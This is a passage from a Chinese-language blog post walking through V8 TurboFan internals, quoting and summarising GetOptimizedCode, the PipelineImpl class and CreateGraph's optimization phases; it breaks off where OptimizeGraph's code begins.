class="line">  <span class="built_in">DCHECK_IMPLIES</span>(function-&gt;<span class="built_in">HasOptimizationMarker</span>(),</span><br><span class="line">                 function-&gt;<span class="built_in">IsInOptimizationQueue</span>());</span><br><span class="line">  <span class="built_in">DCHECK_IMPLIES</span>(function-&gt;<span class="built_in">HasOptimizationMarker</span>(),</span><br><span class="line">                 function-&gt;<span class="built_in">ChecksOptimizationMarker</span>());</span><br><span class="line">  <span class="built_in">DCHECK_IMPLIES</span>(function-&gt;<span class="built_in">IsInOptimizationQueue</span>(),</span><br><span class="line">                 mode == ConcurrencyMode::kConcurrent);</span><br><span class="line">  <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>GetOptimizedCode</code>的函数代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\compiler.cc</span></span><br><span class="line"><span class="function">MaybeHandle&lt;Code&gt; <span class="title">GetOptimizedCode</span><span class="params">(Handle&lt;JSFunction&gt; function,</span></span></span><br><span class="line"><span class="params"><span class="function">                                   ConcurrencyMode mode,</span></span></span><br><span class="line"><span class="params"><span class="function">                                   BailoutId osr_offset = BailoutId::None(),</span></span></span><br><span class="line"><span class="params"><span class="function">                                   JavaScriptFrame* osr_frame = <span class="literal">nullptr</span>)</span> </span>&#123;</span><br><span class="line">  Isolate* isolate = function-&gt;<span class="built_in">GetIsolate</span>();</span><br><span class="line">  <span class="function">Handle&lt;SharedFunctionInfo&gt; <span class="title">shared</span><span class="params">(function-&gt;shared(), isolate)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Make sure we clear the optimization marker on the function so that we</span></span><br><span class="line">  <span class="comment">// don&#x27;t try to re-optimize.</span></span><br><span class="line">  <span class="keyword">if</span> (function-&gt;<span class="built_in">HasOptimizationMarker</span>()) &#123;</span><br><span class="line">    function-&gt;<span class="built_in">ClearOptimizationMarker</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (isolate-&gt;<span class="built_in">debug</span>()-&gt;<span class="built_in">needs_check_on_function_call</span>()) &#123;</span><br><span class="line">    <span class="comment">// Do not optimize when debugger needs to hook into every call.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  Handle&lt;Code&gt; cached_code;</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">GetCodeFromOptimizedCodeCache</span>(function, osr_offset)</span><br><span class="line">          .<span class="built_in">ToHandle</span>(&amp;cached_code)) &#123;</span><br><span class="line">    <span class="keyword">if</span> (FLAG_trace_opt) &#123;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot;[found optimized code for &quot;</span>);</span><br><span class="line">      function-&gt;<span class="built_in">ShortPrint</span>();</span><br><span class="line">      <span class="keyword">if</span> (!osr_offset.<span class="built_in">IsNone</span>()) &#123;</span><br><span class="line">        <span class="built_in">PrintF</span>(<span class="string">&quot; at OSR AST id %d&quot;</span>, osr_offset.<span class="built_in">ToInt</span>());</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot;]\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> cached_code;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Reset profiler ticks, function is no longer considered hot.</span></span><br><span class="line">  <span class="built_in">DCHECK</span>(shared-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">  function-&gt;<span class="built_in">feedback_vector</span>()-&gt;<span class="built_in">set_profiler_ticks</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">  <span class="function">VMState&lt;COMPILER&gt; <span class="title">state</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!isolate-&gt;<span class="built_in">has_pending_exception</span>());</span><br><span class="line">  <span class="function">PostponeInterruptsScope <span class="title">postpone</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="type">bool</span> has_script = shared-&gt;<span class="built_in">script</span>()-&gt;<span class="built_in">IsScript</span>();</span><br><span class="line">  <span class="comment">// BUG(5946): This DCHECK is necessary to make certain that we won&#x27;t</span></span><br><span class="line">  <span class="comment">// tolerate the lack of a script without bytecode.</span></span><br><span class="line">  <span class="built_in">DCHECK_IMPLIES</span>(!has_script, shared-&gt;<span class="built_in">HasBytecodeArray</span>());</span><br><span class="line">  <span class="function">std::unique_ptr&lt;OptimizedCompilationJob&gt; <span class="title">job</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">      compiler::Pipeline::NewCompilationJob(isolate, function, has_script))</span></span>;</span><br><span class="line">  OptimizedCompilationInfo* compilation_info = job-&gt;<span class="built_in">compilation_info</span>();</span><br><span class="line"></span><br><span class="line">  compilation_info-&gt;<span class="built_in">SetOptimizingForOsr</span>(osr_offset, osr_frame);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Do not use TurboFan if we need to be able to set break points.</span></span><br><span class="line">  <span class="keyword">if</span> (compilation_info-&gt;<span class="built_in">shared_info</span>()-&gt;<span class="built_in">HasBreakInfo</span>()) &#123;</span><br><span class="line">    compilation_info-&gt;<span class="built_in">AbortOptimization</span>(BailoutReason::kFunctionBeingDebugged);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Do not use TurboFan when %NeverOptimizeFunction was applied.</span></span><br><span class="line">  <span class="keyword">if</span> (shared-&gt;<span class="built_in">optimization_disabled</span>() &amp;&amp;</span><br><span class="line">      shared-&gt;<span class="built_in">disable_optimization_reason</span>() ==</span><br><span class="line">          BailoutReason::kOptimizationDisabledForTest) &#123;</span><br><span class="line">    compilation_info-&gt;<span class="built_in">AbortOptimization</span>(</span><br><span class="line">        BailoutReason::kOptimizationDisabledForTest);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Do not use TurboFan if optimization is disabled or function doesn&#x27;t pass</span></span><br><span class="line">  <span class="comment">// turbo_filter.</span></span><br><span class="line">  <span class="keyword">if</span> (!FLAG_opt || !shared-&gt;<span class="built_in">PassesFilter</span>(FLAG_turbo_filter)) &#123;</span><br><span class="line">    compilation_info-&gt;<span class="built_in">AbortOptimization</span>(BailoutReason::kOptimizationDisabled);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function">TimerEventScope&lt;TimerEventOptimizeCode&gt; <span class="title">optimize_code_timer</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="function">RuntimeCallTimerScope <span class="title">runtimeTimer</span><span class="params">(isolate,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     RuntimeCallCounterId::kOptimizeCode)</span></span>;</span><br><span class="line">  <span class="built_in">TRACE_EVENT0</span>(<span class="built_in">TRACE_DISABLED_BY_DEFAULT</span>(<span class="string">&quot;v8.compile&quot;</span>), <span class="string">&quot;V8.OptimizeCode&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// In case of concurrent recompilation, all handles below this point will be</span></span><br><span class="line">  <span class="comment">// allocated in a deferred handle scope that is detached and handed off to</span></span><br><span class="line">  <span class="comment">// the background thread when we return.</span></span><br><span class="line">  base::Optional&lt;CompilationHandleScope&gt; compilation;</span><br><span class="line">  <span class="keyword">if</span> (mode == ConcurrencyMode::kConcurrent) &#123;</span><br><span class="line">    compilation.<span class="built_in">emplace</span>(isolate, compilation_info);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// All handles below will be canonicalized.</span></span><br><span class="line">  <span class="function">CanonicalHandleScope <span class="title">canonical</span><span class="params">(isolate)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Reopen handles in the new CompilationHandleScope.</span></span><br><span class="line">  compilation_info-&gt;<span class="built_in">ReopenHandlesInNewHandleScope</span>(isolate);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (mode == ConcurrencyMode::kConcurrent) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">GetOptimizedCodeLater</span>(job.<span class="built_in">get</span>(), isolate)) &#123;</span><br><span class="line">      job.<span class="built_in">release</span>();  <span class="comment">// The background recompile job owns this now.</span></span><br><span class="line"></span><br><span class="line">      <span class="comment">// Set the optimization marker and return a code object which checks it.</span></span><br><span class="line">      function-&gt;<span class="built_in">SetOptimizationMarker</span>(OptimizationMarker::kInOptimizationQueue);</span><br><span class="line">      <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">IsInterpreted</span>() ||</span><br><span class="line">             (!function-&gt;<span class="built_in">is_compiled</span>() &amp;&amp; function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">IsInterpreted</span>()));</span><br><span class="line">      <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">HasBytecodeArray</span>());</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">BUILTIN_CODE</span>(isolate, InterpreterEntryTrampoline);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">GetOptimizedCodeNow</span>(job.<span class="built_in">get</span>(), isolate))</span><br><span class="line">      <span class="keyword">return</span> compilation_info-&gt;<span class="built_in">code</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (isolate-&gt;<span class="built_in">has_pending_exception</span>()) isolate-&gt;<span class="built_in">clear_pending_exception</span>();</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>函数代码有点长，这里总结一下所做的操作：</p><ul><li><p>如果之前该函数被mark为待优化的，则取消该mark（回想一下<code>--trace-opt</code>的输出）</p></li><li><p>如果debugger需要hook该函数，或者在该函数上下了断点，则不优化该函数，直接返回。</p></li><li><p>如果之前已经优化过该函数（存在OptimizedCodeCache），则直接返回之前优化后的代码。</p></li><li><p>重置当前函数的<code>profiler ticks</code>，使得该函数<strong>不再hot</strong>，这样做的目的是使当前函数不被重复优化。</p></li><li><p>如果设置了一些禁止优化的参数（例如<code>%NeverOptimizeFunction</code>，或者设置了<code>turbo_filter</code>），则取消当前函数的优化。</p></li><li><p>以上步骤完成后则开始优化代码，优化代码也有两种不同的方式，分别是<strong>并行优化</strong>和<strong>非并行优化</strong>。在大多数情况下执行的都是并行优化，因为速度更快。</p><p>并行优化会先执行<code>GetOptimizedCodeLater</code>函数，在该函数中判断一些异常条件，例如任务队列已满或者内存占用过高。如果没有异常条件，则执行<code>OptimizedCompilationJob::PrepareJob</code>函数，并继续在更深层次的调用<code>PipelineImpl::CreateGraph</code>来<strong>建图</strong>。</p><p>如果<code>GetOptimizedCodeLater</code>函数工作正常，则将会把优化任务<code>Job</code>放入任务队列中。任务队列将安排另一个线程执行优化操作。</p><p>另一个线程的栈帧如下，该线程将执行<code>Job-&gt;ExecuteJob</code>并在更深层次调用<code>PipelineImpl::OptimizeGraph</code>来<strong>优化之前建立的图结构</strong>：</p><p><img src="/2021/01/v8-turboFan/OptimizeGraph-bt1.png" alt="img"></p><p>当另一个线程在优化代码时，主线程可以继续执行其他任务：</p><p><img src="/2021/01/v8-turboFan/threads.png" alt="img"></p></li></ul></li><li><p>综上我们可以得知，JIT最终的优化位于<code>PipelineImpl</code>类中，包括建图以及优化图等</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\compiler\pipeline.cc</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">PipelineImpl</span> <span class="keyword">final</span> &#123;</span><br><span class="line"> <span class="keyword">public</span>:</span><br><span class="line">  <span class="function"><span class="keyword">explicit</span> <span class="title">PipelineImpl</span><span class="params">(PipelineData* data)</span> : data_(data) &#123;</span>&#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Helpers for executing pipeline phases.</span></span><br><span class="line">  <span class="keyword">template</span> &lt;<span class="keyword">typename</span> Phase&gt;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">()</span></span>;</span><br><span class="line">  <span class="keyword">template</span> &lt;<span class="keyword">typename</span> Phase, <span class="keyword">typename</span> Arg0&gt;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">(Arg0 arg_0)</span></span>;</span><br><span class="line">  <span class="keyword">template</span> &lt;<span class="keyword">typename</span> Phase, <span class="keyword">typename</span> Arg0, <span class="keyword">typename</span> Arg1&gt;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">(Arg0 arg_0, Arg1 arg_1)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step A. Run the graph creation and initial optimization passes.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">CreateGraph</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// B. Run the concurrent optimization passes.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">OptimizeGraph</span><span class="params">(Linkage* linkage)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Substep B.1. Produce a scheduled graph.</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">ComputeScheduledGraph</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Substep B.2. Select instructions from a scheduled graph.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">SelectInstructions</span><span class="params">(Linkage* linkage)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step C. Run the code assembly pass.</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">AssembleCode</span><span class="params">(Linkage* linkage)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step D. Run the code finalization pass.</span></span><br><span class="line">  <span class="function">MaybeHandle&lt;Code&gt; <span class="title">FinalizeCode</span><span class="params">()</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Step E. Install any code dependencies.</span></span><br><span class="line">  <span class="function"><span class="type">bool</span> <span class="title">CommitDependencies</span><span class="params">(Handle&lt;Code&gt; code)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">VerifyGeneratedCodeIsIdempotent</span><span class="params">()</span></span>;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">RunPrintAndVerify</span><span class="params">(<span class="type">const</span> <span class="type">char</span>* phase, <span class="type">bool</span> untyped = <span class="literal">false</span>)</span></span>;</span><br><span class="line">  <span class="function">MaybeHandle&lt;Code&gt; <span class="title">GenerateCode</span><span class="params">(CallDescriptor* call_descriptor)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">AllocateRegisters</span><span class="params">(<span class="type">const</span> RegisterConfiguration* config,</span></span></span><br><span class="line"><span class="params"><span class="function">                         CallDescriptor* call_descriptor, <span class="type">bool</span> run_verifier)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function">OptimizedCompilationInfo* <span class="title">info</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">  <span class="function">Isolate* <span class="title">isolate</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">  <span class="function">CodeGenerator* <span class="title">code_generator</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span>:</span><br><span class="line">  PipelineData* <span class="type">const</span> data_;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li></ul><h2 id="五、初探optimization-phases">五、初探optimization phases</h2><h3 id="1-简介">1. 简介</h3><p>与LLVM IR的各种Pass类似，turboFan中使用各类phases进行建图、搜集信息以及简化图。</p><p>以下是<code>PipelineImpl::CreateGraph</code>函数源码，其中使用了大量的<code>Phase</code>。这些<code>Phase</code>有些用于建图，有些用于优化（在建图时也会执行一部分简单的优化），还有些为接下来的优化做准备：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::CreateGraph</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  PipelineData* data = <span class="keyword">this</span>-&gt;data_;</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">BeginPhaseKind</span>(<span class="string">&quot;graph creation&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>() ||</span><br><span class="line">      <span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_graph_enabled</span>()) &#123;</span><br><span class="line">    <span class="function">CodeTracer::Scope <span class="title">tracing_scope</span><span class="params">(data-&gt;GetCodeTracer())</span></span>;</span><br><span class="line">    <span class="function">OFStream <span class="title">os</span><span class="params">(tracing_scope.file())</span></span>;</span><br><span class="line">    os &lt;&lt; <span class="string">&quot;---------------------------------------------------\n&quot;</span></span><br><span class="line">       &lt;&lt; <span class="string">&quot;Begin compiling method &quot;</span> &lt;&lt; <span class="built_in">info</span>()-&gt;<span class="built_in">GetDebugName</span>().<span class="built_in">get</span>()</span><br><span class="line">       &lt;&lt; <span class="string">&quot; using Turbofan&quot;</span> &lt;&lt; std::endl;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>()) &#123;</span><br><span class="line">    <span class="function">TurboCfgFile <span class="title">tcf</span><span class="params">(isolate())</span></span>;</span><br><span class="line">    tcf &lt;&lt; <span class="built_in">AsC1VCompilation</span>(<span class="built_in">info</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">source_positions</span>()-&gt;<span class="built_in">AddDecorator</span>();</span><br><span class="line">  <span class="keyword">if</span> (data-&gt;<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>()) &#123;</span><br><span class="line">    data-&gt;<span class="built_in">node_origins</span>()-&gt;<span class="built_in">AddDecorator</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">Run</span>&lt;GraphBuilderPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(GraphBuilderPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Perform function context specialization and inlining (if enabled).</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;InliningPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(InliningPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Remove dead-&gt;live edges from the graph.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;EarlyGraphTrimmingPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(EarlyGraphTrimmingPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Run the type-sensitive lowerings and optimizations on the graph.</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// Determine the Typer operation flags.</span></span><br><span class="line">    Typer::Flags flags = Typer::kNoFlags;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">is_sloppy</span>(<span class="built_in">info</span>()-&gt;<span class="built_in">shared_info</span>()-&gt;<span class="built_in">language_mode</span>()) &amp;&amp;</span><br><span class="line">        <span class="built_in">info</span>()-&gt;<span class="built_in">shared_info</span>()-&gt;<span class="built_in">IsUserJavaScript</span>()) &#123;</span><br><span class="line">      <span class="comment">// Sloppy mode functions always have an Object for this.</span></span><br><span class="line">      flags |= Typer::kThisIsReceiver;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">IsClassConstructor</span>(<span class="built_in">info</span>()-&gt;<span class="built_in">shared_info</span>()-&gt;<span class="built_in">kind</span>())) &#123;</span><br><span class="line">      <span class="comment">// Class constructors cannot be [[Call]]ed.</span></span><br><span class="line">      flags |= Typer::kNewTargetIsReceiver;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Type the graph and keep the Typer running on newly created nodes within</span></span><br><span class="line">    <span class="comment">// this scope; the Typer is automatically unlinked from the Graph once we</span></span><br><span class="line">    <span class="comment">// leave this scope below.</span></span><br><span class="line">    <span class="function">Typer <span class="title">typer</span><span class="params">(isolate(), data-&gt;js_heap_broker(), flags, data-&gt;graph())</span></span>;</span><br><span class="line">    <span class="built_in">Run</span>&lt;TyperPhase&gt;(&amp;typer);</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(TyperPhase::<span class="built_in">phase_name</span>());</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Do some hacky things to prepare for the optimization phase.</span></span><br><span class="line">    <span class="comment">// (caching handles, etc.).</span></span><br><span class="line">    <span class="built_in">Run</span>&lt;ConcurrentOptimizationPrepPhase&gt;();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (FLAG_concurrent_compiler_frontend) &#123;</span><br><span class="line">      data-&gt;<span class="built_in">js_heap_broker</span>()-&gt;<span class="built_in">SerializeStandardObjects</span>();</span><br><span class="line">      <span class="built_in">Run</span>&lt;CopyMetadataForConcurrentCompilePhase&gt;();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Lower JSOperators where we can determine types.</span></span><br><span class="line">    <span class="built_in">Run</span>&lt;TypedLoweringPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(TypedLoweringPhase::<span class="built_in">phase_name</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">EndPhaseKind</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>PipelineImpl::OptimizeGraph</code>函数代码如下，该函数将会对所建立的图进行优化：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span 